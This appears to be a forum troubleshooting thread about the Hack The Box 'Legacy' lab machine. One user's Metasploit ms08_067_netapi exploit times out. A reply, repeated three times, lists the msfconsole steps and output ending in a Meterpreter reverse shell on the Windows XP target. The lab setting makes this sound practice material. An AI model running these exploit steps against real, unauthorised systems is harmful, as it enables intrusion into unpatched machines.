I have scanned the legacy machine and as per the walkthrough it says I should use ms08_067_netapi exploit to the machine. When I run the exploit it says;
Rex::ConnectionTimeout The connection timed out (even though I can ping the machine)
Exploit completed, but no session was created.
I have tried changing the target to 7 which is Windows XP SP3 English (NX) instead of 6 which is Windows XP SP3 English (AlwaysOn NX)
I just tried it on my end and it was working fine.
What I did: msfconsole use ms08_067_netapi Changed the RHOST to 10.10.10.4 Changed the LHOST to tun0 run
results:
*] Started reverse TCP handler on TUN0:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened
I just tried it on my end and it was working fine.
What I did: msfconsole use ms08_067_netapi Changed the RHOST to 10.10.10.4 Changed the LHOST to tun0 run
results:
*] Started reverse TCP handler on TUN0:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened
I just tried it on my end and it was working fine.
What I did: msfconsole use ms08_067_netapi Changed the RHOST to 10.10.10.4 Changed the LHOST to tun0 run
results:
*] Started reverse TCP handler on TUN0:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened